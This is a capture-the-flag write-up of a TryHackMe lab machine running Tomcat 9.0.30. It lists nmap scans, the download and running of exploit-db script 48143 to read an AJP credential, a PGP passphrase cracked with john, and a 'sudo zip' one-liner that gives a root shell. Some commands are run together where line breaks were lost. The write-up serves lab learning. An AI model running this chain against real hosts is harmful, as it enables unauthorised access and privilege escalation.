[Enumeration]
- Port scan
nmap -Pn <ip>
2. OS and service scan
nmap -A -p 22,53,8009,8080 <ip>
This machine has Ubuntu linux, Apache Jserv, and Apache Tomcat 9.0.30.
3. Vulnerable scan
nmap --script vuln <ip>
4. Access HTTP site on port 8080
Click Manager App. If I’m lucky enough, I can access it and upload reverse shell.
Failed!!! 403 Access Denied!!! I have to find another way.
[Exploitation]
- Search for exploitation
searchsploit tomcat 9
Copy it
searchsploit -m 41783
Read it. Seems like I cannot use this exploit because current Tomcat version is 9.0.30
Let’s search in exploit-db with “tomcat”
This one is the newest.
Seems like this cve can do the LFI and read some data in tomcat-ajp.
Download it.
wget https://www.exploit-db.com/download/48143
Run the script
python 48143 <target ip>
Seems like I have a credential.
2. Try to login
ssh skyfuck@<ip>
3. Explore the machine
ls
There’re 2 files: credential.pgp and tryhackme.asc.
cat /etc/passwd
There’re 3 users: root, merlin, and skyfuck.
Try to login as merlin
su merlin
Failed!!!
Explore merlin’s directory
cd /homelscd merlinlscat user.txt
[Privilege Escalation]
- Verify sudo rights
sudo -l
skyfuck can’t run sudo.
2. Verify SUID
Not much useful
3. Verify cronjob
crontab -e
Nothing
Seems like I can’t do much with skyfuck. I have to escalate to merlin.
4. Use filezilla to download files in /home/skyfuck with skyfuck’s credential.
5. Decrypt the file
Since It’s pgp file. I have to research. I came across to this:
gpg2john credential.pgp
Seems like I failed.
gpg2john tryhackme.asc
Success!!!
Save as a file
gpg2john tryhackme.asc > hash
Crack password
john --wordlist=rockyou.txt hashjohn hash --show
Now I have password for pgp file.
Import pgp key and decrypt
gpg --import tryhackme.asc gpg --decrypt credential.pgp
Now I have merlin’s password.
6. Login as merlin
su merlin
Success!!!
7. Verify sudo
sudo -l
8. Escalate to root using zip
Reference:
TF=$(mktemp -u)sudo zip $TF /etc/hosts -T -TT 'sh #'
Now I’m root.
9. Find root.txt
cd /rootlscat root.txt